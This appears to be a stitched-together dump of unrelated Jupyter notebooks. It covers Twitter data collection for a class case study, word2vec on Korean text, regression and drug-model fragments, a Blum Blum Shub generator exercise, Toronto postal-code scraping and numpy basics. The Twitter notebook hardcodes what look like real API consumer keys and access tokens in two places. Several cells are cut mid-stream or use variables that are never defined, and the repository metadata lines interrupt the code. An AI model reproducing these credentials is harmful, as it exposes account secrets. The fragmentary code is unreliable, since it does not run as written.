# * In order to solve the above problem, you need to collect some twitter data. You could select a topic that is relevant to your problem, and use Twitter API to download the relevant tweets. It is recommended that the number of tweets should be larger than 200, but smaller than 1 million.
# * Store the tweets you downloaded into a local file (txt file or json file)
# +
import twitter
import json
#---------------------------------------------
# Define a Function to Login Twitter API
def oauth_login_stream():
# Go to http://twitter.com/apps/new to create an app and get values
# for these credentials that you'll need to provide in place of these
# empty string values that are defined as placeholders.
# See https://dev.twitter.com/docs/auth/oauth for more information
# on Twitter's OAuth implementation.
CONSUMER_KEY = 'OdxhYo9fj4llzv19A7sfcwNUH'
CONSUMER_SECRET ='NGD30oWMTMoKXSlZdktIC4A8jzyFQmUuyPJlYo3PnIMwvUy7UF'
OAUTH_TOKEN = '813487117003354112-ccS8P5rAJ85mfPCJhYtdbnZamfQ2V82'
OAUTH_TOKEN_SECRET = 'QRLxSLs3YL1jvVdlmE57PM8YkgLNRw7hbgaGMBhKngCJB'
auth = twitter.oauth.OAuth(OAUTH_TOKEN, OAUTH_TOKEN_SECRET,
CONSUMER_KEY, CONSUMER_SECRET)
twitter_stream = twitter.TwitterStream(auth=auth)
print(twitter_stream)
return twitter_stream
twitter_stream = oauth_login_stream()
# Create a iterator to track 2000 updated tweets with words "Iron Fist" and collect them.
iterator = twitter_stream.statuses.filter(track="Iron Fist" or "IronFist", language="en")
tweet_count = 0
list=[]
for tweet in iterator:
tweet_count += 1
list.append(tweet)
if tweet_count >= 2000: # actually it's hard to get such amonunt of tweets, so we stop half way and get 1188 tweets.
break
data=json.dumps(list,indent=4)
#save the collected data into iron_data.txt file.
file = open('iron_data.txt','w')
file.write(data)
file.close()
# -
# ### Report statistics about the tweets you collected
# +
# The total number of tweets collected: <1188>
# It takes long time to generate 2000, so we stop and store the 1188 tweets.
# -
# # Data Exploration: Exploring the Tweets and Tweet Entities
#
# **(1) Word Count:**
# * Load the tweets you collected in the local file (txt or json)
# * compute the frequencies of the words being used in these tweets.
# * Plot a table of the top 30 most-frequent words with their counts
# +
import json
from collections import Counter
from prettytable import PrettyTable
# Open the iron_data.txt and save the useful data into three lists, text, hashtages and words.
tweets_file = open('iron_data.txt', "r")
data = tweets_file.read()
iron = json.loads(data)
ir_texts = [ da['text'] for da in iron]
hashtags = [ hashtag['text']
for da in iron
for hashtag in da['entities']['hashtags'] ]
words = [ w
for t in ir_texts
for w in t.split() ]
# Compute the frequencies of the words.
label='Word'
pt = PrettyTable(field_names=[label, 'Count'])
c = Counter(words)
# Plot a table of the top 30 words with their counts using Prettytable.
[ pt.add_row(kv) for kv in c.most_common()[:30] ]
pt.align[label], pt.align['Count'] = 'l', 'r'
print(pt)
# -
# ** (2) Find the most popular tweets in your collection of tweets**
#
# Please plot a table of the top 10 most-retweeted tweets in your collection, i.e., the tweets with the largest number of retweet counts.
#
# +
# Your code starts here
# Please add comments or text cells in between to explain the general idea of each block of the code.
# Please feel free to add more cells below this cell if necessary
# Check the retweeted status and count the number of retweets in each one of the collected data
# and extract the information their users, screen_name and text.
retweets = [
(da['retweeted_status']['retweet_count'],
da['retweeted_status']['user']['screen_name'],
da['text'])
for da in iron
if 'retweeted_status' in da
]
# Plot a table of the top 10 tweets with the largest number of retweet counts.
pt = PrettyTable(field_names=['Count', 'Screen Name', 'Text'])
[ pt.add_row(row) for row in sorted(retweets, reverse=True)[:10] ]
pt.max_width['Text'] = 70
pt.align= 'l'
print(pt)
# -
# **(3) Find the most popular Tweet Entities in your collection of tweets**
#
# Please plot the top 10 most-frequent hashtags and top 10 most-mentioned users in your collection of tweets.
# +
# Save the hashtag' information into a list.
hashtags = [ hashtag['text']
for da in iron
for hashtag in da['entities']['hashtags'] ]
# Save the usermentions' information into a list.
usermentions = [ mention['name']
for da in iron
for mention in da['entities']['user_mentions'] ]
# Plot the top 10 most-frequent hashtags and top 10 most-mentioned users of tweets
for label, data in(('hashtags',hashtags),
('user mentions',usermentions)):
pt = PrettyTable(field_names=[label, 'Count'])
c = Counter(data)
[ pt.add_row(kv) for kv in c.most_common()[:10] ]
pt.align[label], pt.align['Count'] = 'l', 'r' # Set column alignment
print(pt)
# -
# Plot a histogram of the number of user mentions in the list using the following bins.
# +
import numpy as np
import random
from matplotlib import pyplot as plt
bins=[0, 1, 10, 20, 30, 40, 50, 100]
# This is all the counts values of user mentions in the data, manually got from the above data
list = [2, 2, 2, 1, 1, 5, 2, 1, 2, 1, 2, 3, 1, 2, 1, 1, 8, 18, 1, 1, 1, 2, 1, 1, 1, 1, 1, 2, 6, 1, 1, 1, 1, 2, 10, 41, 1, 2, 1, 1,
4, 1, 3, 1, 1, 1, 1, 1, 10, 7, 1, 1, 1, 13, 1, 1, 33, 1, 1, 1, 14, 2, 2, 1, 1, 1, 1, 1, 2, 1, 1, 2, 1, 1, 1, 1, 3, 6, 1, 1,
2, 1, 1, 1, 1, 1, 4, 1, 2, 16, 1, 1, 2, 2, 3, 2, 1, 1, 2, 2, 2, 1, 134, 1, 1, 1, 3, 1, 3, 1, 2, 1, 1, 3, 12, 9, 1, 1, 3, 1,
1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 9, 1, 1, 1, 4, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 1, 3, 1, 1, 1, 1, 1, 1, 1, 12, 3, 1,
2, 1, 1, 3, 1, 1, 1, 7, 1, 24, 1, 1, 2, 1, 1, 1, 6, 1, 3, 1, 2, 1, 6, 2, 15, 1, 4, 1, 1, 1, 1, 6, 2, 1, 7, 3, 3, 2, 2, 1, 1,
1, 1, 1, 1, 1, 9, 1, 2, 4, 1, 1, 2, 10, 1, 3, 1, 1, 1, 28, 21, 1, 8, 1, 1, 2, 2, 2]
plt.xlim([min(list)-5, max(list)+5])
plt.hist(list, bins=bins, alpha=0.5)
plt.title('histogram of the number of user mentions')
plt.xlabel('Users being mentioned')
plt.ylabel('count')
plt.show()
# -
#
# ** (4) Getting "All" friends and "All" followers of a popular user in the tweets**
# * choose a popular twitter user who has many followers in your collection of tweets.
# * Get the list of all friends and all followers of the twitter user.
# * Plot 20 out of the followers, plot their ID numbers and screen names in a table.
# * Plot 20 out of the friends (if the user has more than 20 friends), plot their ID numbers and screen names in a table.
# +
import tweepy
from tweepy import Stream, OAuthHandler
from tweepy.streaming import StreamListener
from prettytable import PrettyTable
# Variables that contains the user credentials to access Twitter API.
CONSUMER_KEY = 'TJbcvtJKeOLIC7VJ1P1ueD0Ex'
CONSUMER_SECRET ='Bt30IV0EXK4TOIkuonXEA8llQPW8IsFc8Hhh9y5lSGrWUjtRZv'
ACCESS_TOKEN = '776632770185596928-HleyQ6UtvVPWVcd19vdE8lMz48A3VoJ'
ACCESS_SECRET = 'ph1fjEuyT7ED7zNPoUTL3ZEJGqxRhJBRtAqEH5z7CZXHp'
auth = OAuthHandler(CONSUMER_KEY,CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)
api = tweepy.API(auth)
# Provides a wrapper for the API as provided by Twitter.
if __name__ == "__main__":
user_choose = "FinnJones"
user = api.get_user(user_choose)
print(user.screen_name)
friends = api.friends_ids(user_choose)
followers = api.followers_ids(user_choose)
print('Number of friends:', len(friends))
print("Number of followers(Show 5000 if 5000+):", len(followers))
# Get the first 20 id of friends/followers
friend_list = friends[0:20]
follower_list = followers[0:20]
# Plot 20 out of the friends
user_choose_friends = PrettyTable(["user_id","screen_name"])
for friends_id in (friend_list)[0:20]:
user_choose_friends.add_row([friends_id, api.get_user(friends_id).screen_name] )
print("user_choose_friends:")
print(user_choose_friends)
# Plot 20 out of the followers
user_choose_follows = PrettyTable(["user_id","screen_name"])
for follows_id in (follower_list)[0:20]:
user_choose_follows.add_row([follows_id, api.get_user(follows_id).screen_name] )
print("user_choose_follows:")
print(user_choose_follows)
api.get_user(friends_id).screen_name
mutual = set(friends).intersection(set(followers))
print("Mutual friend's set:")
print(mutual)
# Plot mutual friend's ID numbers and screen names in a table
mutual_friends = PrettyTable(["user_id","screen_name"])
for friends_id in mutual:
mutual_friends.add_row([friends_id, api.get_user(friends_id).screen_name] )
print("mutual_friends:")
print(mutual_friends)
# -
# # The Solution: implement a data science solution to the problem you are trying to solve.
# Briefly describe the idea of your solution to the problem in the following cell:
#Our team collect information about Iron Fist on Twitter first and then figure out the source of those tweets
#And also collect the information about the users who is more likely to be the potential audience of Iron Fist
#Finally, we discover the location of those users and find out how would Netflix focus on different areas.
inf = [ da['user']['location']
for da in iron]
label="Location"
pt = PrettyTable(field_names=[label, 'Count'])
c = Counter(inf)
[ pt.add_row(kv) for kv in c.most_common()[:20] ]
pt.align[label], pt.align['Count'] = 'l', 'r'
print(pt)
# # Results: summarize and visualize the results discovered from the analysis
#
# The figure and tables are all in our PPT.
#
# *-----------------
# # Done
#
# All set!
#
# ** What do you need to submit?**
#
# * **Notebook File**: Save this Jupyter notebook, and find the notebook file in your folder (for example, "filename.ipynb"). This is the file you need to submit. Please make sure all the plotted tables and figures are in the notebook. If you used "jupyter notebook --pylab=inline" to open the notebook, all the figures and tables should have shown up in the notebook.
#
# * **PPT Slides**: please prepare PPT slides (for 10 minutes' talk) to present about the case study . Each team present their case studies in class for 10 minutes.
#
# Please compress all the files in a zipped file.
#
#
# ** How to submit: **
#
# Please submit through Canvas, in the Assignment "Case Study 1".
#
# ** Note: Each team only needs to submit one submission in Canvas **
#
# # Peer-Review Grading Template:
#
# ** Total Points: (100 points) ** Please don't worry about the absolute scores, we will rescale the final grading according to the performance of all teams in the class.
#
# Please add an "**X**" mark in front of your rating:
#
# For example:
#
# *2: bad*
#
# **X** *3: good*
#
# *4: perfect*
#
#
# ---------------------------------
# The Problem:
# ---------------------------------
#
# 1. (5 points) how well did the team describe the problem they are trying to solve using twitter data?
# 0: not clear
# 1: I can barely understand the problem
# 2: okay, can be improved
# 3: good, but can be improved
# 4: very good
# 5: crystal clear
#
# 2. (10 points) do you think the problem is important or has a potential impact?
# 0: not important at all
# 2: not sure if it is important
# 4: seems important, but not clear
# 6: interesting problem
# 8: an important problem, which I want to know the answer myself
# 10: very important, I would be happy invest money on a project like this.
#
# ----------------------------------
# Data Collection:
# ----------------------------------
#
# 3. (10 points) Do you think the data collected are relevant and sufficient for solving the above problem?
# 0: not clear
# 2: I can barely understand what data they are trying to collect
# 4: I can barely understand why the data is relevant to the problem
# 6: the data are relevant to the problem, but better data can be collected
# 8: the data collected are relevant and at a proper scale (> 300 tweets)
# 10: the data are properly collected and they are sufficient
#
# -----------------------------------
# Data Exploration:
# -----------------------------------
# 4. How well did the team solve the following task:
# (1) Word Count (5 points):
# 0: missing answer
# 1: okay, but with major problems
# 3: good, but with minor problems
# 5: perfect
#
# (2) Find the most popular tweets in your collection of tweets: (5 points)
# 0: missing answer
# 1: okay, but with major problems
# 3: good, but with minor problems
# 5: perfect
#
# (3) Find popular twitter entities (5 points)
# 0: missing answer
# 1: okay, but with major problems
# 3: good, but with minor problems
# 5: perfect
#
# (4) Find user's followers and friends (5 points)
# 0: missing answer
# 1: okay, but with major problems
# 3: good, but with minor problems
# 5: perfect
#
# -----------------------------------
# The Solution
# -----------------------------------
# 5. how well did the team describe the solution they used to solve the problem?
# 0: not clear
# 2: I can barely understand
# 4: okay, can be improved
# 6: good, but can be improved
# 8: very good
# 10: crystal clear
#
# 6. how well is the solution in solving the problem?
# 0: not relevant
# 1: barely relevant to the problem
# 2: okay solution, but there is an easier solution.
# 3: good, but can be improved
# 4: very good, but solution is simple/old
# 5: innovative and technically sound
#
# 7. how well did the team implement the solution in python?
# 0: the code is not relevant to the solution proposed
# 2: the code is barely understandable, but not relevant
# 4: okay, the code is clear but incorrect
# 6: good, the code is correct, but with major errors
# 8: very good, the code is correct, but with minor errors
# 10: perfect
#
# -----------------------------------
# The Results
# -----------------------------------
# 8. How well did the team present the results they found in the data?
# 0: not clear
# 2: I can barely understand
# 4: okay, can be improved
# 6: good, but can be improved
# 8: very good
# 10: crystal clear
#
# 9. How do you think the results they found in the data?
# 0: not clear
# 1: likely to be wrong
# 2: okay, maybe wrong
# 3: good, but can be improved
# 4: make sense, but not interesting
# 5: make sense and very interesting
#
# -----------------------------------
# The Presentation
# -----------------------------------
# 10. How all the different parts (data, problem, solution, result) fit together as a coherent story?
# 0: they are irrelevant
# 1: I can barely understand how they are related to each other
# 2: okay, the problem is good, but the solution doesn't match well, or the problem is not solvable.
# 3: good, but the results don't make much sense in the context
# 4: very good fit, but not exciting (the storyline can be improved/polished)
# 5: a perfect story
#
# 11. Did the presenter make good use of the 10 minutes for presentation?
# 0: the team didn't present
# 1: bad, barely finished a small part of the talk
# 2: okay, barely finished most parts of the talk.
# 3: good, finished all parts of the talk, but some part is rushed
# 4: very good, but the allocation of time on different parts can be improved.
# 5: perfect timing and good use of time
#
# 12. How well do you think of the presentation (overall quality)?
# 0: the team didn't present
# 1: bad
# 2: okay
# 3: good
# 4: very good
# 5: perfect
#
#
# -----------------------------------
# Overall:
# -----------------------------------
# 13. How many points out of the 100 do you give to this project in total? Please don't worry about the absolute scores, we will rescale the final grading according to the performance of all teams in the class.
# Total score:
#
# 14. What are the strengths of this project? Briefly, list up to 3 strengths.
# 1:
# 2:
# 3:
#
# 15. What are the weaknesses of this project? Briefly, list up to 3 weaknesses.
# 1:
# 2:
# 3:
#
# 16. Detailed comments and suggestions. What suggestions do you have for this project to improve its quality further.
#
#
#
#
# ---------------------------------
# Your Vote:
# ---------------------------------
# 1. [Overall Quality] Between the two submissions that you are reviewing, which team would you vote for a better score?
# -1: I vote the other team is better than this team
# 0: the same
# 1: I vote this team is better than the other team
#
# 2. [Presentation] Among all the teams in the presentation, which team do you think deserves the best presentation award for this case study?
# 1: Team 1
# 2: Team 2
# 3: Team 3
# 4: Team 4
# 5: Team 5
# 6: Team 6
# 7: Team 7
# 8: Team 8
# 9: Team 9
# 10: Team 10
#
#
| 20,041 |
/PYTHON/test/Untitled.ipynb
|
37400a6b93fe8cf32fd77d2210c38b6c366511e9
|
[] |
no_license
|
SunPyoNoh/TIL
|
https://github.com/SunPyoNoh/TIL
| 0 | 1 | null | 2022-10-16T02:39:39 | 2019-12-03T08:13:40 |
Python
|
Jupyter Notebook
| false | false |
.py
| 7,250 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from collections import Counter
from konlpy.tag import Kkma
from konlpy.utils import pprint
from konlpy.tag import Twitter
from konlpy.tag import Komoran
from gensim.models import word2vec
import matplotlib.pyplot as plt
import re
# +
file = open('./test.txt','r',encoding='utf-8')
lines = file.read()
sentences = re.split('(?<=[2-9]\n)|(?<=[0-9][0-9]\n)|(?<=[0-9][0-9][0-9]\n)', lines)
# -
sent=[]
for stuff in sentences:
sent.append(stuff)
data = word2vec.LineSentence(result)
model = word2vec.Word2Vec(data,
size=200,window=10,hs=1,min_count=2,sg=1)
result = []
for line in sent:
r = []
words = twitter.pos(line,norm=True)
for word in words:
if word[1] not in ["Punctuation","Eomi","Josa"]:
r.append(word[0])
result.append(" ".join(r).strip())
print(result[1000])
# +
# model.save("toji.model")
# model = word2vec.Word2Vec.load('toji.model')
# things = model.most_similar(positive["집"])
print(list(model.wv.vocab.keys()))
# print(things)
# +
# stop_words=stop_words.split(' ')
# result = []
# for w in noun_adj_list:
# word_tokens = word_tokenize(w)
# if word_tokens not in stop_words:
# result.append(w)
# -
model = word2vec.Word2Vec(data, size=200,window=10,hs=1,min_count=2,sg=1)
# +
# window크기 5, 최소 출현수 2, skip-gram, 10000번 학습
model = Word2Vec(noun_adj_list,window = 5,min_count=2,sg=1,iter=10000)
print(list(model.wv.vocab.keys()))
print("vocab length : %d"%len(model.wv.vocab))
print(model.wv.most_similar("범"))
# -
df = pd.DataFrame({'Actual': y_test, 'Predicted': y_pred})
df #COMPARING ACTUAL AND PREDICTED VALUES
# ## PREDICTING THE PERCENTAGE BASED ON NO. OF HOURDS
# +
percentage=reg.predict([[9.25]])
print("Percentage after studying for 9.25 hrs/day",percentage)
# -
# ## EVALUATING THE ALGORITHM
from sklearn import metrics
from sklearn.metrics import r2_score
print('Mean Absolute Error:',metrics.mean_absolute_error(y_test, y_pred))
print('Mean Squared Error:',metrics.mean_squared_error(y_test, y_pred))
print('R2 Score' , r2_score(y_test,y_pred))
_residual_standard_error', 'EC50_residual_standard_error']]
# Then we join the run data with the model data, setting Drugname and run pairs as the index. We select non-compromised runs and drop dubplicate rows. Finally, we give each run a quality score equal to the IC or EC quality of the drug used depending on what metric the model was trained on
full = drug_data.join(data, on='run', rsuffix='_drug').reset_index().set_index(['Drug', 'run'])
full = full[full['started'] > pd.to_datetime('2020-04-15 18:00:00')].drop_duplicates()
full['Quality'] = [c_dict.loc[i[0]]['IC'] if full.loc[i]['metric_drug'][0]=='AUC_IC50' else c_dict.loc[i[0]]['EC'] for i in full.index]
full['Quality'] = full['Quality'].fillna(-1)
# Here we plot IC/EC quality vs $ r^2 $. We observe clear drop-offs for very low quality and for very high quality. We will drop all runs under a specific quality threhsold since these models can be considered faulty (the data they received wasn't good)
sns.set()
g = sns.relplot(x='Quality', y='r2_score', data=full, kind='scatter', height=9, col='metric_drug', hue='metric_drug', legend=False)
g.set(yscale='symlog')
g.set(ylim=(None, 3))
#plt.savefig('IC quality vs r2.png')
# Now we plot the IC/EC quality vs average $ r^2 $ of models trying to predict resistance to a specific drug. All models predicting the resistance to a drug with very low average quality are dropped.
drug_ic = full.groupby('Drug').mean()
drug_ic['CCLs'] = [dr[dr['Drug_name']==i].shape[0] for i in drug_ic.index]
sns.set(font_scale=1.3)
fig, ax = plt.subplots(figsize=(1.9*5,5))
g = sns.scatterplot(x='Quality', y='r2_score', data=drug_ic, hue='CCLs', ax=ax, legend='brief')
g.set(yscale='symlog')
plt.legend(loc='lower right')
plt.tight_layout()
#plt.savefig('graphs/ICqualitylog.eps', format='eps')
# ## A threshold of -0.95 IC quality is set
# All runs below that are disregarded
sns.set(font_scale=1)
g = sns.relplot(x='Quality', y='r2_score', data=full, kind='scatter', height=8, aspect=1.7)
g.set(yscale='symlog')
#plt.legend(loc = 'lower right')
#plt.savefig('Chop.png')
full = full[full['Quality']>-0.95]
full = full[full['started'] > pd.to_datetime('2020-04-15 18:00:00')]
full['norm'] = full['norm'].fillna('None')
# Here we create a dataframe containing the average $ r^2 $ for all drugs
d_r = full[['Drug', 'r2_score']].groupby('Drug').mean()
# Here we calculate the drug-agnostic $ r^2 $ for all different runs, this is done by substracting the average $ r^2 $ for the drug being modeled from the $ r^2 $ obtained
full['r2'] = [full.loc[i]['r2_score']-d_r.loc[full.loc[i]['Drug']]['r2_score'] for i in full.index]
# Here we create a column that contains, feda, ajive or none depending on the domain adaptation method used
full['da'] = ['feda' if full.loc[i]['feda'] else 'ajive' if full.loc[i]['ajive'] is not None and full.loc[i]['ajive']>0 else 'none' for i in full.index]
| 5,306 |
/blumblum.ipynb
|
aac2affe41cab4cd403b2f4f0463bd670231bbad
|
[] |
no_license
|
evdokiaa/Crypto
|
https://github.com/evdokiaa/Crypto
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 40,934 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Ασκηση 6 - Γεννητρια BlumBlumShub
import random
import math
import gmpy2
# Ορίζουμε ορισμένες συναρτήσεις που θα μας φανούν χρήσιμες αργότερα.
# +
#επαναλαμβανόμενος τετραγωνισμός
def fastmod(base , power , mod):
result = 1
while(power > 0):
if(power%2 == 1):
result = (result*base)%mod
power = power -1
power = power/2
base = (base*base)%mod
return result%mod
#επιστρέφει τους διαιρέτες του n
def divisors(n):
divisors = []
large_divisors = []
for i in range(2,int(math.sqrt(n)+1)):
if n % i == 0 :
divisors.append(i)
if(i*i!=n):
large_divisors.append(int(n/i))
divisors.extend(large_divisors)
return divisors
#true αν ειναι σχετικά πρώτοι, false διαφορετικά
def coprime(a,b):
if (math.gcd(a,b)==1):
return True
else:
return False
#έλεγχος πρώτων αριθμών με το τεστ του fermat
def fermat_test(n,k):
if n == 2:
return True
if n % 2 == 0:
return False
for i in range(k):
a = random.randint(1,n-1)
if fastmod (a , n-1, n) != 1:
return False
return True
#true αν το p είναι Safe prime, false διαφορετικά
def safePrime(p):
if (p>3 and p%4 == 3 and fermat_test(p,200) and fermat_test((p-1)/2,200)):
return True
return False
#true αν το p είναι Safe Safe prime, false διαφορετικά
def safeSafePrime(p):
if (safePrime(p) and safePrime((p-1)/2)):
return True
return False
def parity(n):
parity = 0
while n:
parity = (parity+1)
parity = parity%2
n = n & (n - 1)
return parity
# -
# Ερώτημα α.
# Θα βρούμε το s και το Ν, σύμφωνα με τις 2 προυποθέσεις που ορίστηκαν στο ερώτημα 5α:
# 1. N τέτοιο, έτσι ωστε το 2 έχει τάξη λ(λ(Ν)) στην ομάδα λ(Ν)/2.
# 2. s τέτοιο, ώστε να έχει τάξη λ(Ν)/2 στην ομάδα Ν.
#
#
# +
#βρίσκει εναν Safe Safe prime με μηκος σε bits που ορίζουμε
def findSafeSafePrime(bits):
a = random.getrandbits(bits)
while (safeSafePrime(a) == 0):
a = random.getrandbits(bits)
return a
#υπολογισμός της λ(Ν) για τα δεδομένα του προβλήματος μας, οπου p,q SafeSafe primes
def lamda(p,q):
p1 = (p-1)/2
q1 = (q-1)/2
return(int(2*p1*q1))
#το ίδιο για τη λ(λ(Ν))
def lamda_lamda(p,q):
p1 = (p-1)/2
q1 = (q-1)/2
p2 = (p1-1)/2
q2 = (q1-1)/2
return(int(2*p2*q2))
#Condition1 για μέγιστη περίοδο
def condition1(p,q):
l_l = lamda_lamda(p,q)
l =int( lamda(p,q)/2 )
a = fastmod(2, l_l , l )
if (a==1):
for x in divisors(l_l):
if (fastmod(2,x,l) == 1):
return(False)
return True
#επιστρέφει ένα s, σχετικά πρώτο με το Ν
def coprime_seed(p,q):
s = random.randint(3,p*q)
while (not (coprime(s,p) and coprime(s,q))):
s = random.randint(3,p*q)
return s
#condition2 για μέγιστη περίοδο
def condition2(p,q,s):
l = int(lamda(p,q)/2)
a = fastmod(s,l,p*q)
if (a==1):
for x in divisors(l):
if (fastmod(s,x,p*q) == 1):
return False
return True
#βρίσκει Ν, για το οποιο πληρείται το 1ο condition
def findN(bits):
p = findSafeSafePrime(bits)
q = findSafeSafePrime(bits)
while condition1(p,q)==0 or p==q:
p = findSafeSafePrime(bits)
q = findSafeSafePrime(bits)
return (p,q,p*q)
#επιστρέφει ενα s, έτσι ώστε να πληρείται το 2ο condition.
def findSeed(p,q):
s = coprime_seed(p,q)
while (not condition2(p,q,s)):
s = coprime_seed(p,q)
return s
#βρίσκει όλες τις αρχικές τιμές της γεννήτριας, p,q,s.
def create_generator(bits):
p,q,N = findN(bits)
s = findSeed(p,q)
return p,q,s
# -
p,q,s = create_generator(20)
print('p:',p)
print('q:',q)
print('N:' , p*q)
print('s:',s)
# Eρώτημα β: Πειραματική επαλήθευση της περιόδου.
# Εδώ θα το τρέξουμε για λίγο μικρότερο αριθμό bits.
# +
def period(p,q,s):
N = p*q
period = lamda_lamda(p,q)
s1=gmpy2.mpz(s)
for i in range(1,period+1):
s1 = fastmod(s1,2,N)
if (s1 == s and i<period):
print('μικρότερη περίοδος:' ,i)
break
print('s μετα απο λ(λ(Ν)) επαναλήψεις:', s1, 'οπότε η περίοδος είναι επιθυμητή:', i)
p,q,s = create_generator(14)
print('p:',p, 'q:', q, 's:', s)
print('H αναμενόμενη περίοδος είναι:', lamda_lamda(p,q))
period(p,q,s)
# -
# Ερώτημα δ,ε. Πειραματική προσέγγιση του π.
# +
#implementation of blumblumshub generator, for fixed number of bits
def blum(p,q,s,bits, mode):
result = 0
for x in range(bits):
s = fastmod(s,2,p*q)
if(mode==1):
result =(result << 1) + s%2
if (mode==2):
result = (result << 1) + parity(s)
state = s
return result,state
def pi_approx(trials,mode):
circle = 0
p,q,s = create_generator(20)
for i in range(trials):
a,s = blum(p,q,s,16,mode)
x = a & 255
y = a >> 8
if ((x - 127.5)*(x - 127.5) + (y- 127.5)*(y- 127.5) <= 127.5*127.5) :
circle += 1.0
#print('Pi/4 is = 0.78539816339')
pi = (circle+1.0) / (trials+1.0)
#print('Our approximation is' , pi)
return(pi)
# -
print(pi_approx(1000,1))
print(pi_approx(1000,2))
import matplotlib.pyplot as plt
import numpy as np
import time
# +
a = []
#trials = np.logspace(3,4,20, endpoint=True)
trials = [200,500,1000,2000,3000,4000,5000,10000]
start_time = time.time()
for i in trials:
a.append(pi_approx(i,1))
print(time.time()-start_time)
plt.plot(trials,a)
plt.hlines(y=math.pi/4,xmin=0,xmax = 10000, colors='red', linestyles='solid', label='pi/4')
plt.show()
# +
a = []
#trials = np.logspace(3,4,20, endpoint=True)
trials = [200,500,1000,2000,3000,4000,5000,10000]
start_time = time.time()
for i in trials:
a.append(pi_approx(i,2))
plt.plot(trials,a)
plt.hlines(y=math.pi/4,xmin=0,xmax = 10000, colors='red', linestyles='solid', label='pi/4')
plt.show()
# -
| 6,268 |
/chapter04_组的概念与定义.ipynb
|
aa74f8f5c81ba31434b15fc6614107acc56b2fc2
|
[] |
no_license
|
dyanfeng/python
|
https://github.com/dyanfeng/python
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 17,607 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np # library to handle data in a vectorized manner
import pandas as pd # library for data analsysis
pd.set_option("display.max_columns", None)
pd.set_option("display.max_rows", None)
import json # library to handle JSON files
from geopy.geocoders import Nominatim # convert an address into latitude and longitude values
import requests # library to handle requests
from bs4 import BeautifulSoup # library to parse HTML and XML documents
from pandas.io.json import json_normalize # tranform JSON file into a pandas dataframe
# Matplotlib and associated plotting modules
import matplotlib.cm as cm
import matplotlib.colors as colors
# import k-means from clustering stage
from sklearn.cluster import KMeans
import folium # map rendering library
print("Libraries imported.")
# -
# ## Scrap data from Wikipedia page into a DataFrame
# send the GET request
data = requests.get('https://en.wikipedia.org/wiki/List_of_postal_codes_of_Canada:_M').text
# parse data from the html into a beautifulsoup object
soup = BeautifulSoup(data, 'html.parser')
# create three lists to store table data
postalCodeList = []
boroughList = []
neighborhoodList = []
# +
# find the table
#soup.find('table').find_all('tr')
# +
# find all the rows of the table
#soup.find('table').find_all('tr')
# +
# for each row of the table, find all the table data
#for row in soup.find('table').find_all('tr'):
# cells = row.find_all('td')
# -
# append the data into the respective lists
for row in soup.find('table').find_all('tr'):
cells = row.find_all('td')
if(len(cells) > 0):
postalCodeList.append(cells[0].text)
boroughList.append(cells[1].text)
neighborhoodList.append(cells[2].text.rstrip('\n')) # avoid new lines in neighborhood cell
# +
# create a new DataFrame from the three lists
toronto_df = pd.DataFrame({"PostalCode": postalCodeList,
"Borough": boroughList,
"Neighborhood": neighborhoodList})
toronto_df.head()
# -
for col in toronto_df.columns:
toronto_df[col]=toronto_df[col].str.replace('\n','')
toronto_df.head()
# ## Drop cells with a borough that is "Not assigned"
# drop cells with a borough that is Not assigned
toronto_df_dropna = toronto_df[toronto_df.Borough != "Not assigned"].reset_index(drop=True)
toronto_df_dropna.head()
# ## Group neighborhoods in the same borough
# group neighborhoods in the same borough
toronto_df_grouped = toronto_df_dropna.groupby(["PostalCode", "Borough"], as_index=False).agg(lambda x: ", ".join(x))
toronto_df_grouped.head()
# ## For Neighborhood="Not assigned", make the value the same as Borough
# +
# for Neighborhood="Not assigned", make the value the same as Borough
for index, row in toronto_df_grouped.iterrows():
if row["Neighborhood"] == "Not assigned":
row["Neighborhood"] = row["Borough"]
toronto_df_grouped.head()
# -
# ## Check whether it is the same as required by the question
# +
# create a new test dataframe
column_names = ["PostalCode", "Borough", "Neighborhood"]
test_df = pd.DataFrame(columns=column_names)
test_list = ["M5G", "M2H", "M4B", "M1J", "M4G", "M4M", "M1R", "M9V", "M9L", "M5V", "M1B", "M5A"]
for postcode in test_list:
test_df = test_df.append(toronto_df_grouped[toronto_df_grouped["PostalCode"]==postcode], ignore_index=True)
test_df
# -
# ## Finally, print the number of rows of the cleaned dataframe
# print the number of rows of the cleaned dataframe
toronto_df_grouped.shape
p(*d.maps[1:])。
# +
import collections
x = {'a': 1, 'b': 2}
y = {'b': 10, 'c': 11}
z = collections.ChainMap(y, x)
print(z.maps)
xx = {'d': 55, 'e': 88}
z = z.parents
print(z.maps)
# -
: 104} outputId="a93f7efc-5915-4091-8a8d-985808ce89a2"
arr = np.arange(15).reshape(3,5)#range of array from 0 to 15
print(arr)
print(arr.ndim)
print(arr.itemsize)
# + id="1F0JNmqMjt9A" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 104} outputId="b7138322-4b3a-403c-f8b3-0652d925bf7a"
arr = np.arange(15).reshape(3,5)#range of array from 0 to 15
print(arr)
print(arr.ndim)
print(type(arr))
# + id="cx4iKL3nkKeh" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 87} outputId="84a9db38-9b7b-4583-8bb3-541c3114c2fe"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
print(arr)
print(arr.shape)
# + id="G3mc4iq-khK1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 87} outputId="63a75b35-f418-4177-de6e-26926d716265"
arr = np.array([[1,2,3], [5,6,7], [9,10,11]])
print(arr)
print(arr.shape)
